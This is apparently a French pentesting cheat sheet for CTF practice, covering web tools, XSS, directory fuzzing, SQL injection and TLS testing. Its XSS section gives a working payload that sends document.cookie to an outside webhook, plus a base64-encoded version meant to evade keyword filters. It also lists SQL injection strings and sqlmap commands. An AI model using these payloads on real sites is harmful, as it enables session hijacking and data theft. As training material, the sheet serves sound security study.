Skip to the content.

Web


Curl / Wget

# ajouter un header Ă  la requĂȘte
curl http://10.10.10.215 -H host:academy.htb

Pour obtenir la version hors-ligne d'un site :

# version longue
wget -r -l1 --page-requisite --convert-links --adjust-extension --timestamping --no-verbose <--span-hosts> url
# version courte
wget -r -l1 -p -k -E -N -nv <-H> url

JWT (Json Web Token)

Pour manipuler un JWT en ligne : https://jwt.io/

Pour manipuler un JWT en python : https://pyjwt.readthedocs.io/en/latest/

API

Pour requĂȘter une API : https://reqbin.com

Obfuscation Javascript

Outil pour obfusquer du Javascript : http://dean.edwards.name/packer

Outil pour dé-obfusquer du Javascript : https://lelinhtinh.github.io/de4js

XSS (Cross Site Scripting)

// Pour tester
<p id="p1">Testarossa</p>
<script>
document.getElementById("p1").innerHTML = "Life found a way !";
</script>

Webhook : https://busterbaxter.requestcatcher.com

// Pour exploiter
<script>
var script = document.createElement("script");
script.src = "https://busterbaxter.requestcatcher.com/" + document.cookie;
document.body.appendChild(script);
</script>:-)

// Pour bypass les filtres qui recherchent des mots clés : base64 encoded payload
<body onload="eval(atob('dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdC5zcmMgPSAiaHR0cHM6Ly9idXN0ZXJiYXh0ZXIucmVxdWVzdGNhdGNoZXIuY29tLyIgKyBkb2N1bWVudC5jb29raWU7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChzY3JpcHQpOw=='))">

XSS Polyglot

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Polyglots/XSS-Polyglot-Ultimate-0xsobky.txt :

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('Life found a way !') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('Life found a way !')//>\x3e

Scan d'URL web

Attention ! Ne pas utiliser en CTF réaliste

dirb http://10.10.10.215 -r -o academy.dirb.txt -H host:academy.htb
ffuf -c -w /usr/share/wordlists/dirb/common.txt -o ffuf.md -of md -u http://10.10.123.36/FUZZ

Injection SQL

https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet

https://www.journaldev.com/34028/sql-injection-in-java

Pour tester Ă  la main :

-- Boolean Based SQL Injection
2 or 1=1
-- Union Based SQL Injection
2 union select username, password from tableuser
-- Time-Based SQL Injection
2 + SLEEP(5)
-- Error Based SQL Injection
recon

sqlmap :

# Ă  partir d'une url
sqlmap -u "http://academy.htb/admin.php?uid=0&password=0" #--level 5 --risk 3
# Ă  partir d'une requĂȘte interceptĂ©e par burpsuite
sqlmap -r academy.burp.txt

TLS

testssl.sh permet de tester :

Pour lancer :

git clone --depth 1 https://github.com/drwetter/testssl.sh.git
cd testssl.sh
./testssl.sh --html 172.17.0.2:50051